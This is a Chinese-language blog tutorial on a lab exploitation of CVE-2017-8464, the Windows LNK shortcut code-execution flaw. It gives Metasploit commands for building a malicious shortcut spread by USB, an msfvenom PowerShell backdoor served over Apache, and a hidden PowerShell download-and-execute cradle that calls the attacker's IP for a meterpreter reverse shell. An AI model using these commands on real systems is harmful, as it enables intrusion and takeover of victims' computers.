赞
踩
CVE-2017-8464又称远程快捷方式漏洞
攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
注释:.LNK是用于指向其他文件的一种文件,这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。
环境搭建
攻击机:kali IP:
靶机:win7 IP:
攻击方法一:
利用Metasploit中CVE-2017-8464模块制作快捷方式文件,通过U盘感染靶机
msfconsole
search cve-2017-8464
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set payload windows/meterpreter/reverse_tcp
show options
set lhost [你的kali ip]
show targets
run或者exploit
use multi/handler
set paylaod windows/meterpreter/reverse_tcp
set LHOST [你的IP地址]
run
攻击方法二:
利用powershell远程快捷
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.118 -f psh-reflection>search.ps1
msfvenom是专门用来生成后门的 其中search.ps1是加载有payload的powershell脚本文件
然后将目录下的search.ps1文件移动到/var/www/html/下
随后打开Apache服务
service apache2 start
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.118`/search.ps1');test.ps1"
https://blog.csdn.net/qq_27446553/article/details/45966489?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [你的kali ip]
run
双击靶机上的powershell.exe,即可在kali机器上执行shell
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。